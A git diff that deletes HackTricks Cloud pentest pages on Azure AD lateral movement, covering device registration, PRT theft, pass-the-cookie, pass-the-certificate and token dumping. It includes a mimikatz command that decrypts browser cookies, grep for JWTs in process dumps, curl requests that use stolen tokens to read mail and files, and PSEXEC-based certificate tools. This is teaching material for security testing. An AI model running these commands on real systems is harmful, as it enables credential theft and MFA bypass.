-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-device-registration.md b/pentesting-cloud/azure-security/az-device-registration.md deleted file mode 100644 index 44e42482b..000000000 --- a/pentesting-cloud/azure-security/az-device-registration.md +++ /dev/null @@ -1,138 +0,0 @@ -# Az - Device Registration - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -When a device joins AzureAD a new object is created in AzureAD. - -When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt. - -Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible. - -Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).: - -```bash -dsregcmd /status -``` - -After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.** - -For more information about what is a PRT check: - -{% content-ref url="az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md" %} -[az-primary-refresh-token-prt.md](az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) -{% endcontent-ref %} - -### TPM - Trusted Platform Module - -The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\ -But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights. - -If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys): - -{% content-ref url="az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} -[pass-the-prt.md](az-lateral-movement-cloud-on-prem/pass-the-prt.md) -{% endcontent-ref %} - -## Registering a device with SSO tokens - -It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it: - -```bash -# Initialize SSO flow -roadrecon auth prt-init -.\ROADtoken.exe - -# Request token with PRT with PRT cookie -roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie - -# Custom pyhton script to register a device (check roadtx) -registerdevice.py -``` - -Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. - -{% hint style="success" %} -Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**. -{% endhint %} - -{% hint style="danger" %} -This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md). -{% endhint %} - -## Overwriting a device ticket - -It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A). - -
- -{% hint style="danger" %} -However, this was fixed. -{% endhint %} - -## Overwrite WHFB key - -[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) - -Attack summary: - -* It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO -* It **defeats TPM protection** as the key is **sniffed during the generation** of the new key -* This also provides **persistence** - -
- -Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph. - -Then, it's possible to generate a new key with: - -```bash -roadtx genhellokey -d -k tempkey.key -``` - -and then PATCH the information of the searchableDeviceKey: - -
- -It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check: - -{% content-ref url="az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md" %} -[az-phishing-primary-refresh-token-microsoft-entra.md](az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) -{% endcontent-ref %} - -
- -## References - -* [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A) -* [https://www.youtube.com/watch?v=x609c-MUZ\_g](https://www.youtube.com/watch?v=x609c-MUZ_g) -* [https://www.youtube.com/watch?v=AFay\_58QubY](https://www.youtube.com/watch?v=AFay_58QubY) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md deleted file mode 100644 index 5cb58cb86..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md +++ /dev/null @@ -1,91 +0,0 @@ -# Az - Lateral Movement (Cloud - On-Prem) - -## Az - Lateral Movement (Cloud - On-Prem) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### On-Prem machines connected to cloud - -There are different ways a machine can be connected to the cloud: - -#### Azure AD joined - -
- -#### Workplace joined - -

https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large

- -#### Hybrid joined - -

https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large

- -#### Workplace joined on AADJ or Hybrid - -

https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large

- -### Tokens and limitations - -In Azure AD, there are different types of tokens with specific limitations: - -* **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource. -* **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications. -* **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device. -* **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens. - -The most interesting type of token is the Primary Refresh Token (PRT). - -{% content-ref url="az-primary-refresh-token-prt.md" %} -[az-primary-refresh-token-prt.md](az-primary-refresh-token-prt.md) -{% endcontent-ref %} - -### Pivoting Techniques - -From the **compromised machine to the cloud**: - -* [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login -* [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text. -* [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it -* [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it. -* [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another - -From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**: - -* [**Azure AD Connect**](azure-ad-connect-hybrid-identity/) -* **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md) - -#### [Roadtx](https://github.com/dirkjanm/ROADtools) - -This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/) - -## References - -* [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md deleted file mode 100644 index 0b2239549..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md +++ /dev/null @@ -1,65 +0,0 @@ -# Az - Local Cloud Credentials - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Local Token Storage and Security Considerations - -### Azure CLI (Command-Line Interface) - -Tokens and sensitive data are stored locally by Azure CLI, raising security concerns: - -1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`. -2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details. -3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as: - * Executed commands with credentials embedded. - * URLs accessed using tokens, potentially revealing sensitive information. - -### Azure PowerShell - -Azure PowerShell also stores tokens and sensitive data, which can be accessed locally: - -1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext. -2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`. -3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access. - -## Automatic Tools to find them - -* [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe) -* [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1) - -## Security Recommendations - -Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by: - -* Limiting access rights to these files. -* Regularly monitoring and auditing these directories for unauthorized access or unexpected changes. -* Employing encryption for sensitive files where possible. -* Educating users about the risks and best practices for handling such sensitive information. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md deleted file mode 100644 index 31e22a7a5..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md +++ /dev/null @@ -1,67 +0,0 @@ -# Az - Pass the Certificate - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Pass the Certificate (Azure) - -In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism. - -In super simplified terms: - -* The machine (client) initiating the connection **needs a certificate from Azure AD for a user**. -* Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD** -* Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**. - -In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack: - -* Username -* Tenant ID -* PRT -* Security context -* Derived Key - -It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:** - -{% code overflow="wrap" %} -```bash -RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE] -``` -{% endcode %} - -The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user. - -```bash -Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP -``` - -## References - -* For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md deleted file mode 100644 index cdead6bd4..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md +++ /dev/null @@ -1,59 +0,0 @@ -# Az - Pass the Cookie - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Why Cookies? - -Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate. - -You can see where are **browser cookies located** in: - -{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome" %} - -## Attack - -The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in: - -{% embed url="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords" %} - -With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command: - -```bash -mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit -``` - -For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately. - -Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated. - -## References - -* [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md deleted file mode 100644 index 301eb11d2..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Phishing Primary Refresh Token (Microsoft Entra) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md deleted file mode 100644 index 1520fc868..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Primary Refresh Token (PRT) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md deleted file mode 100644 index 3512fd876..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md +++ /dev/null @@ -1,65 +0,0 @@ -# Az - Processes Memory Access Token - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## **Basic Information** - -As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA. - -Steps: - -1. Dump the excel processes synchronized with in EntraID user with your favourite tool. -2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output -3. Find the tokens that interest you the most and run tools over them: - -{% code overflow="wrap" %} -```bash -# Check the identity of the token -curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq - -# Check the email (you need a token authorized in login.microsoftonline.com) -curl -s -H "Authorization: Bearer " https://outlook.office.com/api/v2.0/me/messages | jq - -# Download a file from Teams -## You need a token that can access graph.microsoft.com -## Then, find the inside the memory and call -curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/sites//drives | jq - -## Then, list one drive -curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sites//drives/' | jq - -## Finally, download a file from that drive: -┌──(magichk㉿black-pearl)-[~] -└─$ curl -o -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>' -``` -{% endcode %} - -**Note that these kind of access tokens can be also found inside other processes.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md deleted file mode 100644 index 109104b7e..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md +++ /dev/null @@ -1,86 +0,0 @@ -# Az AD Connect - Hybrid Identity - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
